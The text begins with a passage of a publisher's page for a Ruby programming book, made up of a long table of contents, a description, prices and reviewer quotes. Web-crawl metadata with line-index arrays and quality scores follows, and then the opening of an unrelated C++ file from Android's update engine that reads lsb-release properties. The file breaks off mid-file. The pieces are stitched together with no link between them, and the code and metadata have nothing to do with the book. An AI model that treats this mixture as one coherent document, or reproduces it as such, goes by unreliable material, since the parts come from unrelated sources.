6.3.7. Block parameters and variable scope
6.4. Error handling and exceptions
6.4.1. Raising and rescuing exceptions
6.4.2. The rescue keyword to the rescue!
6.4.3. Raising exceptions explicitly
6.4.4. Capturing an exception in a rescue clause
6.4.5. The ensure clause
6.4.6. Creating your own exception classes
6.5. Summary
Part 2 Built-in classes and modules
7. Built-in essentials
7.1. Ruby’s literal constructors
7.2. Recurrent syntactic sugar
7.2.1. Defining operators by defining methods
7.2.2. Customizing unary operators
7.3. Bang (!) methods and "danger"
7.3.1. Destructive (receiver-changing) effects as danger
7.3.2. Destructiveness and "danger" vary independently
7.4. Built-in and custom to_* (conversion) methods
7.4.1. String conversion: to_s
7.4.2. Array conversion with to_a and the * operator
7.4.3. Numerical conversion with to_i and to_f
7.4.4. Role-playing to_* methods
7.5. Boolean states, Boolean objects, and nil
7.5.1. True and false as states
7.5.2. true and false as objects
7.5.3. The special object nil
7.6. Comparing two objects
7.6.1. Equality tests
7.6.2. Comparisons and the Comparable module
7.7. Inspecting object capabilities
7.7.1. Listing an object’s methods
7.7.2. Querying class and module objects
7.7.3. Filtered and selected method lists
7.8. Summary
8. Strings, symbols, and other scalar objects
8.1. Working with strings
8.1.1. String notation
8.1.2. Basic string manipulation
8.1.3. Querying strings
8.1.4. String comparison and ordering
8.1.5. String transformation
8.1.6. String conversions
8.1.7. String encoding: A brief introduction
8.2. Symbols and their uses
8.2.1. Chief characteristics of symbols
8.2.2. Symbols and identifiers
8.2.3. Symbols in practice
8.2.4. Strings and symbols in comparison
8.3. Numerical objects
8.3.1. Numerical classes
8.3.2. Performing arithmetic operations
8.4. Times and dates
8.4.1. Instantiating date/time objects
8.4.2. Date/time query methods
8.4.3. Date/time formatting methods
8.4.4. Date/time conversion methods
8.5. Summary
9. Collection and container objects
9.1. Arrays and hashes in comparison
9.2. Collection handling with arrays
9.2.1. Creating a new array
9.2.2. Inserting, retrieving, and removing array elements
9.2.3. Combining arrays with other arrays
9.2.4. Array transformations
9.2.5. Array querying
9.3. Hashes
9.3.1. Creating a new hash
9.3.2. Inserting, retrieving, and removing hash pairs
9.3.3. Specifying default hash values and behavior
9.3.4. Combining hashes with other hashes
9.3.5. Hash transformations
9.3.6. Hash querying
9.3.7. Hashes as final method arguments
9.3.8. A detour back to argument syntax: Named (keyword) arguments
9.4. Ranges
9.4.1. Creating a range
9.4.2. Range-inclusion logic
9.5. Sets
9.5.1. Set creation
9.5.2. Manipulating set elements
9.5.3. Subsets and supersets
9.6. Summary
10. Collections central: Enumerable and Enumerator
10.1. Gaining enumerability through each
10.2. Enumerable Boolean queries
10.3. Enumerable searching and selecting
10.3.1. Getting the first match with find
10.3.2. Getting all matches with find_all (a.k.a. select) and reject
10.3.3. Selecting on threequal matches with grep
10.3.4. Organizing selection results with group_by and partition
10.4. Element-wise enumerable operations
10.4.1. The first method
10.4.2. The take and drop methods
10.4.3. The min and max methods
10.5. Relatives of each
10.5.1. reverse_each
10.5.2. The each_with_index method (and each.with_index)
10.5.3. The each_slice and each_cons methods
10.5.4. The cycle method
10.5.5. Enumerable reduction with inject
10.6. The map method
10.6.1. The return value of map
10.6.2. In-place mapping with map!
10.7. Strings as quasi-enumerables
10.8. Sorting enumerables
10.8.1. Where the Comparable module fits into enumerable sorting (or doesn’t)
10.8.2. Defining sort-order logic with a block
10.8.3. Concise sorting with sort_by
10.9. Enumerators and the next dimension of enumerability
10.9.1. Creating enumerators with a code block
10.9.2. Attaching enumerators to other objects
10.9.3. Implicit creation of enumerators by blockless iterator calls
10.10. Enumerator semantics and uses
10.10.1. How to use an enumerator’s each method
10.10.2. Protecting objects with enumerators
10.10.3. Fine-grained iteration with enumerators
10.10.4. Adding enumerability with an enumerator
10.11. Enumerator method chaining
10.11.1. Economizing on intermediate objects
10.11.2. Indexing enumerables with with_index
10.11.3. Exclusive-or operations on strings with enumerators
10.12. Lazy enumerators
10.12.1. FizzBuzz with a lazy enumerator
10.13. Summary
11. Regular expressions and regexp-based string operations
11.1. What are regular expressions?
11.2. Writing regular expressions
11.2.1. Seeing patterns
11.2.2. Simple matching with literal regular expressions
11.3. Building a pattern in a regular expression
11.3.1. Literal characters in patterns
11.3.2. The dot wildcard character (.)
11.3.3. Character classes
11.4. Matching, substring captures, and MatchData
11.4.1. Capturing submatches with parentheses
11.4.2. Match success and failure
11.4.3. Two ways of getting the captures
11.4.4. Other MatchData information
11.5. Fine-tuning regular expressions with quantifiers, anchors, and modifiers
11.5.1. Constraining matches with quantifiers
11.5.2. Greedy (and non-greedy) quantifiers
11.5.3. Regular expression anchors and assertions
11.5.4. Modifiers
11.6. Converting strings and regular expressions to each other
11.6.1. String-to-regexp idioms
11.6.2. Going from a regular expression to a string
11.7. Common methods that use regular expressions
11.7.1. String#scan
11.7.2. String#split
11.7.3. sub/sub! and gsub/gsub!
11.7.4. Case equality and grep
11.8. Summary
12. File and I/O operations
12.1. How Ruby’s I/O system is put together
12.1.1. The IO class
12.1.2. IO objects as enumerables
12.1.3. STDIN, STDOUT, STDERR
12.1.4. A little more about keyboard input
12.2. Basic file operations
12.2.1. The basics of reading from files
12.2.2. Line-based file reading
12.2.3. Byte- and character-based file reading
12.2.4. Seeking and querying file position
12.2.5. Reading files with File class methods
12.2.6. Writing to files
12.2.7. Using blocks to scope file operations
12.2.8. File enumerability
12.2.9. File I/O exceptions and errors
12.3. Querying IO and File objects
12.3.1. Getting information from the File class and the FileTest module
12.3.2. Deriving file information with File::Stat
12.4. Directory manipulation with the Dir class
12.4.1. Reading a directory’s entries
12.4.2. Directory manipulation and querying
12.5. File tools from the standard library
12.5.1. The FileUtils module
12.5.2. The Pathname class
12.5.3. The StringIO class
12.5.4. The open-uri library
12.6. Summary
Part 3 Ruby dynamics
13. Object individuation
13.1. Where the singleton methods are: The singleton class
13.1.1. Dual determination through singleton classes
13.1.2. Examining and modifying a singleton class directly
13.1.3. Singleton classes on the method-lookup path
13.1.4. The singleton_class method
13.1.5. Class methods in (even more) depth
13.2. Modifying Ruby’s core classes and modules
13.2.1. The risks of changing core functionality
13.2.2. Additive changes
13.2.3. Pass-through overrides
13.2.4. Per-object changes with extend
13.2.5. Using refinements to affect core behavior
13.3. BasicObject as ancestor and class
13.3.1. Using BasicObject
13.3.2. Implementing a subclass of BasicObject
13.4. Summary
14. Callable and runnable objects
14.1. Basic anonymous functions: The Proc class
14.1.1. Proc objects
14.1.2. Procs and blocks and how they differ
14.1.3. Block-proc conversions
14.1.4. Using Symbol#to_proc for conciseness
14.1.5. Procs as closures
14.1.6. Proc parameters and arguments
14.2. Creating functions with lambda and →
14.3. Methods as objects
14.3.1. Capturing Method objects
14.3.2. The rationale for methods as objects
14.4. The eval family of methods
14.4.1. Executing arbitrary strings as code with eval
14.4.2. The dangers of eval
14.4.3. The instance_eval method
14.4.4. Using class_eval (a.k.a. module_eval)
14.5. Parallel execution with threads
14.5.1. Killing, stopping, and starting threads
14.5.2. A threaded date server
14.5.3. Writing a chat server using sockets and threads
14.5.4. Threads and variables
14.5.5. Manipulating thread keys
14.6. Issuing system commands from inside Ruby programs
14.6.1. The system method and backticks
14.6.2. Communicating with programs via open and popen3
14.7. Summary
15. Callbacks, hooks, and runtime introspection
15.1. Callbacks and hooks
15.1.1. Intercepting unrecognized messages with method_missing
15.1.2. Trapping include and prepend operations
15.1.3. Intercepting extend
15.1.4. Intercepting inheritance with Class#inherited
15.1.5. The Module#const_missing method
15.1.6. The method_added and singleton_method_added methods
15.2. Interpreting object capability queries
15.2.1. Listing an object’s non-private methods
15.2.2. Listing private and protected methods
15.2.3. Getting class and module instance methods
15.2.4. Listing objects' singleton methods
15.3. Introspection of variables and constants
15.3.1. Listing local and global variables
15.3.2. Listing instance variables
15.4. Tracing execution
15.4.1. Examining the stack trace with caller
15.4.2. Writing a tool for parsing stack traces
15.5. Callbacks and method inspection in practice
15.5.1. MicroTest background: MiniTest
15.5.2. Specifying and implementing MicroTest
15.6. Summary
index
About the Technology
This is a good time for Ruby! It's powerful like Java or C++, and has dynamic features that let your code react gracefully to changes at runtime. And it's elegant, so creating applications, development tools, and administrative scripts is easier and more straightforward. With the long-awaited Ruby 2, an active development community, and countless libraries and productivity tools, Ruby has come into its own.
About the book
The Well-Grounded Rubyist, Second Edition is a beautifully written tutorial that begins with your first Ruby program and goes on to explore sophisticated topics like callable objects, reflection, and threading. The book concentrates on the language, preparing you to use Ruby in any way you choose. This second edition includes coverage of new Ruby features such as keyword arguments, lazy enumerators, and Module#prepend, along with updated information on new and changed core classes and methods.
What's inside
• Clear explanations of Ruby concepts
• Numerous simple examples
• Updated for Ruby 2.1
• Prepares you to use Ruby anywhere for any purpose
About the author
David A. Black is an internationally known Ruby developer, author, trainer, speaker, event organizer, and founder of Ruby Central, as well as a Lead Consultant at Cyrus Innovation.
buy
combo $44.99 pBook + eBook + liveBook
includes previous edition
eBook $35.99 pdf + ePub + kindle + liveBook
includes previous edition
Add liveAudio for only $19.99
placing your order...
Don't refresh or navigate away from the page.
FREE domestic shipping on three or more pBooks
All wheat, no chaff—takes you from Ruby programmer to full-fledged Rubyist.
Doug Sparling, Andrews McMeel Universal
Provides powerful insights and digs into Ruby’s quirks. Revelatory.
Ted Roche, Ted Roche & Associates, LLC
The best way to learn Ruby fundamentals.
Derek Sivers, sivers.org
|
{
"url": "https://www.manning.com/books/the-well-grounded-rubyist-second-edition",
"source_domain": "www.manning.com",
"snapshot_id": "crawl=CC-MAIN-2018-51",
"warc_metadata": {
"Content-Length": "150197",
"Content-Type": "application/http; msgtype=response",
"WARC-Block-Digest": "sha1:SXF322VXRCPZN5N35IUIEK2OG4H2Y5MK",
"WARC-Concurrent-To": "<urn:uuid:b8b4c428-f89e-40bc-8588-d3b301c15df4>",
"WARC-Date": "2018-12-13T15:30:48Z",
"WARC-IP-Address": "35.166.24.88",
"WARC-Identified-Payload-Type": "text/html",
"WARC-Payload-Digest": "sha1:JNCFNQE6LTHMMLSLX4ZROMFAHQPNFPO2",
"WARC-Record-ID": "<urn:uuid:6fb1fed8-9c16-46aa-b5ee-19854fdb7c98>",
"WARC-Target-URI": "https://www.manning.com/books/the-well-grounded-rubyist-second-edition",
"WARC-Truncated": null,
"WARC-Type": "response",
"WARC-Warcinfo-ID": "<urn:uuid:a2c86243-e2ef-4558-a54d-400faf7abc70>"
},
"warc_info": "isPartOf: CC-MAIN-2018-51\r\npublisher: Common Crawl\r\ndescription: Wide crawl of the web for December 2018\r\noperator: Common Crawl Admin ([email protected])\r\nhostname: ip-10-65-213-53.ec2.internal\r\nsoftware: Apache Nutch 1.15 (modified, https://github.com/commoncrawl/nutch/)\r\nrobots: checked via crawler-commons 0.11-SNAPSHOT (https://github.com/crawler-commons/crawler-commons)\r\nformat: WARC File Format 1.1\r\nconformsTo: http://iipc.github.io/warc-specifications/specifications/warc-format/warc-1.1/"
}
|
{
"line_start_idx": [
0,
42,
57,
71,
94,
108,
137,
138,
209,
210,
238,
239,
601,
602,
965,
966,
1011,
1012,
1020,
1021,
1050,
1051,
1067,
1068,
1084,
1085,
1114,
1115,
1139,
1140,
1176,
1177,
1211,
1212,
1246,
1247,
1286,
1287,
1335,
1336,
1379,
1380,
1415,
1416,
1445,
1446,
1484,
1485,
1562,
1563,
1625,
1626,
1733,
1734,
1760,
1761,
1808,
1809,
1854,
1855,
1905,
1906,
1937,
1938,
1962,
1963,
2011,
2012,
2053,
2054,
2119,
2120,
2139,
2140,
2180,
2181,
2229,
2230,
2243,
2244,
2285,
2286,
2310,
2311,
2346,
2347,
2380,
2381,
2416,
2417,
2453,
2454,
2504,
2505,
2546,
2547,
2581,
2582,
2641,
2642,
2707,
2708,
2747,
2748,
2810,
2811,
2877,
2878,
2934,
2935,
2973,
2974,
3013,
3014,
3050,
3051,
3092,
3093,
3136,
3137,
3182,
3183,
3225,
3226,
3284,
3285,
3324,
3325,
3383,
3384,
3397,
3398,
3433,
3434,
3461,
3462,
3486,
3487,
3513,
3514,
3539,
3540,
3581,
3582,
3623,
3624,
3644,
3645,
3687,
3688,
3739,
3740,
3772,
3773,
3818,
3819,
3864,
3865,
3898,
3899,
3945,
3946,
3991,
3992,
4037,
4038,
4084,
4085,
4115,
4116,
4154,
4155,
4201,
4202,
4248,
4249,
4291,
4292,
4316,
4317,
4347,
4348,
4391,
4392,
4432,
4433,
4446,
4447,
4483,
4484,
4523,
4524,
4570,
4571,
4607,
4608,
4640,
4641,
4682,
4683,
4731,
4732,
4779,
4780,
4805,
4806,
4851,
4852,
4902,
4903,
4934,
4935,
4977,
4978,
5014,
5015,
5049,
5050,
5085,
5086,
5099,
5100,
5152,
5153,
5205,
5206,
5244,
5245,
5278,
5279,
5336,
5337,
5385,
5386,
5435,
5436,
5459,
5460,
5501,
5502,
5521,
5522,
5574,
5575,
5616,
5617,
5669,
5670,
5705,
5706,
5729,
5730,
5755,
5756,
5797,
5798,
5833,
5834,
5881,
5882,
5895,
5896,
5923,
5924,
5956,
5957,
5991,
5992,
6047,
6048,
6071,
6072,
6106,
6107,
6157,
6158,
6219,
6220,
6261,
6262,
6328,
6329,
6358,
6359,
6395,
6396,
6448,
6449,
6475,
6476,
6512,
6513,
6537,
6538,
6581,
6582,
6617,
6618,
6657,
6658,
6699,
6700,
6737,
6738,
6787,
6788,
6813,
6814,
6857,
6858,
6871,
6872,
6908,
6909,
6932,
6933,
6966,
6967,
6998,
6999,
7045,
7046,
7081,
7082,
7117,
7118,
7175,
7176,
7231,
7232,
7283,
7284,
7315,
7316,
7369,
7370,
7417,
7418,
7451,
7452,
7498,
7499,
7531,
7532,
7565,
7566,
7596,
7597,
7624,
7625,
7647,
7648,
7693,
7694,
7730,
7731,
7766,
7767,
7808,
7809,
7851,
7852,
7865,
7866,
7912,
7913,
7939,
7940,
7963,
7964,
7997,
7998,
8022,
8023,
8061,
8062,
8091,
8092,
8118,
8119,
8164,
8165,
8193,
8194,
8234,
8235,
8266,
8267,
8294,
8295,
8336,
8337,
8360,
8361,
8386,
8387,
8427,
8428,
8449,
8450,
8489,
8490,
8521,
8522,
8558,
8559,
8595,
8596,
8609,
8610,
8646,
8647,
8684,
8685,
8722,
8723,
8751,
8752,
8810,
8811,
8853,
8854,
8883,
8884,
8906,
8907,
8919,
8920,
8947,
8948,
9002,
9003,
9054,
9055,
9097,
9098,
9126,
9127,
9148,
9149,
9189,
9190,
9257,
9258,
9270,
9271,
9295,
9296,
9325,
9326,
9336,
9337,
9357,
9358,
9391,
9392,
9421,
9422,
9435,
9436,
9487,
9488,
9529,
9530,
9563,
9564,
9605,
9606,
9648,
9649,
9718,
9719,
9768,
9769,
9834,
9835,
9876,
9877,
9902,
9903,
9937,
9938,
9970,
9971,
9995,
9996,
10017,
10018,
10075,
10076,
10121,
10122,
10147,
10148,
10189,
10190,
10211,
10212,
10244,
10245,
10280,
10281,
10316,
10317,
10343,
10344,
10422,
10423,
10470,
10471,
10508,
10509,
10567,
10568,
10615,
10616,
10663,
10664,
10733,
10734,
10771,
10772,
10820,
10821,
10866,
10867,
10916,
10917,
10966,
10967,
11001,
11002,
11047,
11048,
11094,
11095,
11156,
11157,
11181,
11182,
11223,
11224,
11239,
11240,
11299,
11300,
11336,
11337,
11371,
11372,
11396,
11397,
11454,
11455,
11504,
11505,
11544,
11545,
11584,
11585,
11611,
11612,
11662,
11663,
11709,
11710,
11744,
11745,
11786,
11787,
11823,
11824,
11903,
11904,
11950,
11951,
11995,
11996,
12046,
12047,
12065,
12066,
12129,
12130,
12162,
12163,
12215,
12216,
12266,
12267,
12287,
12288,
12309,
12310,
12342,
12343,
12374,
12375,
12389,
12390,
12418,
12419,
12463,
12464,
12485,
12486,
12520,
12521,
12551,
12552,
12595,
12596,
12624,
12625,
12666,
12667,
12699,
12700,
12747,
12748,
12791,
12792,
12838,
12839,
12864,
12865,
12911,
12912,
12939,
12940,
12979,
12980,
13015,
13016,
13088,
13089,
13139,
13140,
13188,
13189,
13227,
13228,
13272,
13273,
13316,
13317,
13346,
13347,
13374,
13375,
13402,
13403,
13432,
13433,
13447,
13448,
13469,
13470,
13495,
13496,
13555,
13556,
13609,
13610,
13669,
13670,
13722,
13723,
13758,
13759,
13802,
13803,
13851,
13852,
13901,
13902,
13927,
13928,
13959,
13960,
13999,
14000,
14050,
14051,
14091,
14092,
14118,
14119,
14166,
14167,
14181,
14182,
14216,
14217,
14265,
14266,
14287,
14288,
14333,
14334,
14365,
14366,
14411,
14412,
14438,
14439,
14477,
14478,
14521,
14522,
14547,
14548,
14581,
14582,
14627,
14628,
14661,
14662,
14716,
14717,
14745,
14746,
14779,
14780,
14826,
14827,
14865,
14866,
14914,
14915,
14946,
14947,
15003,
15004,
15034,
15035,
15068,
15069,
15125,
15126,
15166,
15167,
15223,
15224,
15238,
15239,
15287,
15288,
15314,
15315,
15378,
15379,
15427,
15428,
15456,
15457,
15511,
15512,
15552,
15553,
15613,
15614,
15659,
15660,
15708,
15709,
15755,
15756,
15806,
15807,
15850,
15851,
15898,
15899,
15942,
15943,
15978,
15979,
16003,
16004,
16050,
16051,
16099,
16100,
16150,
16151,
16190,
16191,
16237,
16238,
16252,
16253,
16259,
16260,
16281,
16282,
16693,
16694,
16709,
16710,
17209,
17210,
17224,
17225,
17265,
17294,
17319,
17373,
17374,
17391,
17392,
17573,
17574,
17575,
17579,
17617,
17643,
17687,
17713,
17743,
17744,
17766,
17767,
17813,
17814,
17861,
17862,
17938,
17939,
17979,
17980,
18048,
18049,
18088,
18089,
18130,
18131
],
"line_end_idx": [
42,
57,
71,
94,
108,
137,
138,
209,
210,
238,
239,
601,
602,
965,
966,
1011,
1012,
1020,
1021,
1050,
1051,
1067,
1068,
1084,
1085,
1114,
1115,
1139,
1140,
1176,
1177,
1211,
1212,
1246,
1247,
1286,
1287,
1335,
1336,
1379,
1380,
1415,
1416,
1445,
1446,
1484,
1485,
1562,
1563,
1625,
1626,
1733,
1734,
1760,
1761,
1808,
1809,
1854,
1855,
1905,
1906,
1937,
1938,
1962,
1963,
2011,
2012,
2053,
2054,
2119,
2120,
2139,
2140,
2180,
2181,
2229,
2230,
2243,
2244,
2285,
2286,
2310,
2311,
2346,
2347,
2380,
2381,
2416,
2417,
2453,
2454,
2504,
2505,
2546,
2547,
2581,
2582,
2641,
2642,
2707,
2708,
2747,
2748,
2810,
2811,
2877,
2878,
2934,
2935,
2973,
2974,
3013,
3014,
3050,
3051,
3092,
3093,
3136,
3137,
3182,
3183,
3225,
3226,
3284,
3285,
3324,
3325,
3383,
3384,
3397,
3398,
3433,
3434,
3461,
3462,
3486,
3487,
3513,
3514,
3539,
3540,
3581,
3582,
3623,
3624,
3644,
3645,
3687,
3688,
3739,
3740,
3772,
3773,
3818,
3819,
3864,
3865,
3898,
3899,
3945,
3946,
3991,
3992,
4037,
4038,
4084,
4085,
4115,
4116,
4154,
4155,
4201,
4202,
4248,
4249,
4291,
4292,
4316,
4317,
4347,
4348,
4391,
4392,
4432,
4433,
4446,
4447,
4483,
4484,
4523,
4524,
4570,
4571,
4607,
4608,
4640,
4641,
4682,
4683,
4731,
4732,
4779,
4780,
4805,
4806,
4851,
4852,
4902,
4903,
4934,
4935,
4977,
4978,
5014,
5015,
5049,
5050,
5085,
5086,
5099,
5100,
5152,
5153,
5205,
5206,
5244,
5245,
5278,
5279,
5336,
5337,
5385,
5386,
5435,
5436,
5459,
5460,
5501,
5502,
5521,
5522,
5574,
5575,
5616,
5617,
5669,
5670,
5705,
5706,
5729,
5730,
5755,
5756,
5797,
5798,
5833,
5834,
5881,
5882,
5895,
5896,
5923,
5924,
5956,
5957,
5991,
5992,
6047,
6048,
6071,
6072,
6106,
6107,
6157,
6158,
6219,
6220,
6261,
6262,
6328,
6329,
6358,
6359,
6395,
6396,
6448,
6449,
6475,
6476,
6512,
6513,
6537,
6538,
6581,
6582,
6617,
6618,
6657,
6658,
6699,
6700,
6737,
6738,
6787,
6788,
6813,
6814,
6857,
6858,
6871,
6872,
6908,
6909,
6932,
6933,
6966,
6967,
6998,
6999,
7045,
7046,
7081,
7082,
7117,
7118,
7175,
7176,
7231,
7232,
7283,
7284,
7315,
7316,
7369,
7370,
7417,
7418,
7451,
7452,
7498,
7499,
7531,
7532,
7565,
7566,
7596,
7597,
7624,
7625,
7647,
7648,
7693,
7694,
7730,
7731,
7766,
7767,
7808,
7809,
7851,
7852,
7865,
7866,
7912,
7913,
7939,
7940,
7963,
7964,
7997,
7998,
8022,
8023,
8061,
8062,
8091,
8092,
8118,
8119,
8164,
8165,
8193,
8194,
8234,
8235,
8266,
8267,
8294,
8295,
8336,
8337,
8360,
8361,
8386,
8387,
8427,
8428,
8449,
8450,
8489,
8490,
8521,
8522,
8558,
8559,
8595,
8596,
8609,
8610,
8646,
8647,
8684,
8685,
8722,
8723,
8751,
8752,
8810,
8811,
8853,
8854,
8883,
8884,
8906,
8907,
8919,
8920,
8947,
8948,
9002,
9003,
9054,
9055,
9097,
9098,
9126,
9127,
9148,
9149,
9189,
9190,
9257,
9258,
9270,
9271,
9295,
9296,
9325,
9326,
9336,
9337,
9357,
9358,
9391,
9392,
9421,
9422,
9435,
9436,
9487,
9488,
9529,
9530,
9563,
9564,
9605,
9606,
9648,
9649,
9718,
9719,
9768,
9769,
9834,
9835,
9876,
9877,
9902,
9903,
9937,
9938,
9970,
9971,
9995,
9996,
10017,
10018,
10075,
10076,
10121,
10122,
10147,
10148,
10189,
10190,
10211,
10212,
10244,
10245,
10280,
10281,
10316,
10317,
10343,
10344,
10422,
10423,
10470,
10471,
10508,
10509,
10567,
10568,
10615,
10616,
10663,
10664,
10733,
10734,
10771,
10772,
10820,
10821,
10866,
10867,
10916,
10917,
10966,
10967,
11001,
11002,
11047,
11048,
11094,
11095,
11156,
11157,
11181,
11182,
11223,
11224,
11239,
11240,
11299,
11300,
11336,
11337,
11371,
11372,
11396,
11397,
11454,
11455,
11504,
11505,
11544,
11545,
11584,
11585,
11611,
11612,
11662,
11663,
11709,
11710,
11744,
11745,
11786,
11787,
11823,
11824,
11903,
11904,
11950,
11951,
11995,
11996,
12046,
12047,
12065,
12066,
12129,
12130,
12162,
12163,
12215,
12216,
12266,
12267,
12287,
12288,
12309,
12310,
12342,
12343,
12374,
12375,
12389,
12390,
12418,
12419,
12463,
12464,
12485,
12486,
12520,
12521,
12551,
12552,
12595,
12596,
12624,
12625,
12666,
12667,
12699,
12700,
12747,
12748,
12791,
12792,
12838,
12839,
12864,
12865,
12911,
12912,
12939,
12940,
12979,
12980,
13015,
13016,
13088,
13089,
13139,
13140,
13188,
13189,
13227,
13228,
13272,
13273,
13316,
13317,
13346,
13347,
13374,
13375,
13402,
13403,
13432,
13433,
13447,
13448,
13469,
13470,
13495,
13496,
13555,
13556,
13609,
13610,
13669,
13670,
13722,
13723,
13758,
13759,
13802,
13803,
13851,
13852,
13901,
13902,
13927,
13928,
13959,
13960,
13999,
14000,
14050,
14051,
14091,
14092,
14118,
14119,
14166,
14167,
14181,
14182,
14216,
14217,
14265,
14266,
14287,
14288,
14333,
14334,
14365,
14366,
14411,
14412,
14438,
14439,
14477,
14478,
14521,
14522,
14547,
14548,
14581,
14582,
14627,
14628,
14661,
14662,
14716,
14717,
14745,
14746,
14779,
14780,
14826,
14827,
14865,
14866,
14914,
14915,
14946,
14947,
15003,
15004,
15034,
15035,
15068,
15069,
15125,
15126,
15166,
15167,
15223,
15224,
15238,
15239,
15287,
15288,
15314,
15315,
15378,
15379,
15427,
15428,
15456,
15457,
15511,
15512,
15552,
15553,
15613,
15614,
15659,
15660,
15708,
15709,
15755,
15756,
15806,
15807,
15850,
15851,
15898,
15899,
15942,
15943,
15978,
15979,
16003,
16004,
16050,
16051,
16099,
16100,
16150,
16151,
16190,
16191,
16237,
16238,
16252,
16253,
16259,
16260,
16281,
16282,
16693,
16694,
16709,
16710,
17209,
17210,
17224,
17225,
17265,
17294,
17319,
17373,
17374,
17391,
17392,
17573,
17574,
17575,
17579,
17617,
17643,
17687,
17713,
17743,
17744,
17766,
17767,
17813,
17814,
17861,
17862,
17938,
17939,
17979,
17980,
18048,
18049,
18088,
18089,
18130,
18131,
18155
]
}
|
{
"red_pajama_v2": {
"ccnet_original_length": 18155,
"ccnet_original_nlines": 836,
"rps_doc_curly_bracket": 0,
"rps_doc_ldnoobw_words": 0,
"rps_doc_lorem_ipsum": 0,
"rps_doc_stop_word_fraction": 0.14084507524967194,
"rps_doc_ut1_blacklist": 0,
"rps_doc_frac_all_caps_words": 0.0077024600468575954,
"rps_doc_frac_lines_end_with_ellipsis": 0.0011947399470955133,
"rps_doc_frac_no_alph_words": 0.5136443972587585,
"rps_doc_frac_unique_words": 0.46230554580688477,
"rps_doc_mean_word_length": 5.53330659866333,
"rps_doc_num_sentences": 1062,
"rps_doc_symbol_to_word_ratio": 0.0017605599714443088,
"rps_doc_unigram_entropy": 6.244073390960693,
"rps_doc_word_count": 2507,
"rps_doc_frac_chars_dupe_10grams": 0,
"rps_doc_frac_chars_dupe_5grams": 0.01203863974660635,
"rps_doc_frac_chars_dupe_6grams": 0,
"rps_doc_frac_chars_dupe_7grams": 0,
"rps_doc_frac_chars_dupe_8grams": 0,
"rps_doc_frac_chars_dupe_9grams": 0,
"rps_doc_frac_chars_top_2gram": 0.004541520029306412,
"rps_doc_frac_chars_top_3gram": 0.004757789894938469,
"rps_doc_frac_chars_top_4gram": 0.006055360194295645,
"rps_doc_books_importance": -1300.29736328125,
"rps_doc_books_importance_length_correction": -1300.29736328125,
"rps_doc_openwebtext_importance": -1387.5938720703125,
"rps_doc_openwebtext_importance_length_correction": -1387.5938720703125,
"rps_doc_wikipedia_importance": -1552.7740478515625,
"rps_doc_wikipedia_importance_length_correction": -1552.7740478515625
},
"fasttext": {
"dclm": 0.031728148460388184,
"english": 0.6918622851371765,
"fineweb_edu_approx": 2.5246360301971436,
"eai_general_math": 0.2544723153114319,
"eai_open_web_math": 0.03183149918913841,
"eai_web_code": 0.9285066723823547
}
}
|
{
"free_decimal_correspondence": {
"primary": {
"code": "005.133",
"labels": {
"level_1": "General works, books and libraries, information sciences",
"level_2": "",
"level_3": "Computer programming"
}
},
"secondary": {
"code": "005.1",
"labels": {
"level_1": "General works, books and libraries, information sciences",
"level_2": "",
"level_3": "Computer programming"
}
}
},
"bloom_cognitive_process": {
"primary": {
"code": "2",
"label": "Understand"
},
"secondary": {
"code": "3",
"label": "Apply"
}
},
"bloom_knowledge_domain": {
"primary": {
"code": "2",
"label": "Conceptual"
},
"secondary": {
"code": "3",
"label": "Procedural"
}
},
"document_type_v1": {
"primary": {
"code": "3",
"label": "Reference/Encyclopedic/Educational"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"extraction_artifacts": {
"primary": {
"code": "0",
"label": "No Artifacts"
},
"secondary": {
"code": "3",
"label": "Irrelevant Content"
}
},
"missing_content": {
"primary": {
"code": "0",
"label": "No missing content"
},
"secondary": {
"code": "2",
"label": "Click Here References"
}
},
"document_type_v2": {
"primary": {
"code": "8",
"label": "Documentation"
},
"secondary": {
"code": "23",
"label": "Tutorial"
}
},
"reasoning_depth": {
"primary": {
"code": "3",
"label": "Intermediate Reasoning"
},
"secondary": {
"code": "4",
"label": "Advanced Reasoning"
}
},
"technical_correctness": {
"primary": {
"code": "4",
"label": "Highly Correct"
},
"secondary": {
"code": "5",
"label": "Exceptionally Correct"
}
},
"education_level": {
"primary": {
"code": "3",
"label": "Undergraduate Level"
},
"secondary": {
"code": "4",
"label": "Graduate/Expert Level"
}
}
}
|
71f077df794da2774531b20248bb19b0
|
-3,245,357,915,084,005,000
|
blob: 5ab8f052b3874c7f19e50b9aa12c0ca655fe3834 [file] [log] [blame]
//
// Copyright (C) 2015 The Android Open Source Project
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
#include "update_engine/image_properties.h"
#include <string>
#include <vector>
#include <base/files/file_util.h>
#include <base/logging.h>
#include <brillo/key_value_store.h>
#include "update_engine/common/constants.h"
#include "update_engine/common/hardware_interface.h"
#include "update_engine/common/platform_constants.h"
#include "update_engine/common/utils.h"
#include "update_engine/system_state.h"
namespace {
const char kLsbRelease[] = "/etc/lsb-release";
const char kLsbReleaseAppIdKey[] = "CHROMEOS_RELEASE_APPID";
const char kLsbReleaseAutoUpdateServerKey[] = "CHROMEOS_AUSERVER";
const char kLsbReleaseBoardAppIdKey[] = "CHROMEOS_BOARD_APPID";
const char kLsbReleaseBoardKey[] = "CHROMEOS_RELEASE_BOARD";
const char kLsbReleaseCanaryAppIdKey[] = "CHROMEOS_CANARY_APPID";
const char kLsbReleaseIsPowerwashAllowedKey[] = "CHROMEOS_IS_POWERWASH_ALLOWED";
const char kLsbReleaseUpdateChannelKey[] = "CHROMEOS_RELEASE_TRACK";
const char kLsbReleaseVersionKey[] = "CHROMEOS_RELEASE_VERSION";
const char kDefaultAppId[] = "{87efface-864d-49a5-9bb3-4b050a7c227a}";
// A prefix added to the path, used for testing.
const char* root_prefix = nullptr;
std::string GetStringWithDefault(const brillo::KeyValueStore& store,
const std::string& key,
const std::string& default_value) {
std::string result;
if (store.GetString(key, &result))
return result;
LOG(INFO) << "Cannot load ImageProperty " << key << ", using default value "
<< default_value;
return default_value;
}
enum class LsbReleaseSource {
kSystem,
kStateful,
};
// Loads the lsb-release properties into the key-value |store| reading the file
// from either the system image or the stateful partition as specified by
// |source|. The loaded values are added to the store, possibly overriding
// existing values.
